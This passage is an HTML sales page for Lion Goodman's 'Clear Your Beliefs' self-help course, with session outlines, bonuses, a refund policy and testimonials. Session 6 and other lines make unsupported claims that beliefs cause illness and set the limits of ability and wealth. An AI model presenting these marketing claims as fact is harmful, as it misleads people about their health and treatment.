vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n<p>	<strong>=&gt; <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<strong>=&gt; <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n<strong>=&gt; <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n<strong>=&gt; <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n<strong>=&gt; <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n<strong>=&gt; <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>=&gt; <em>Professional Coaching Sessions:</strong> </em> Optional.</p>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" 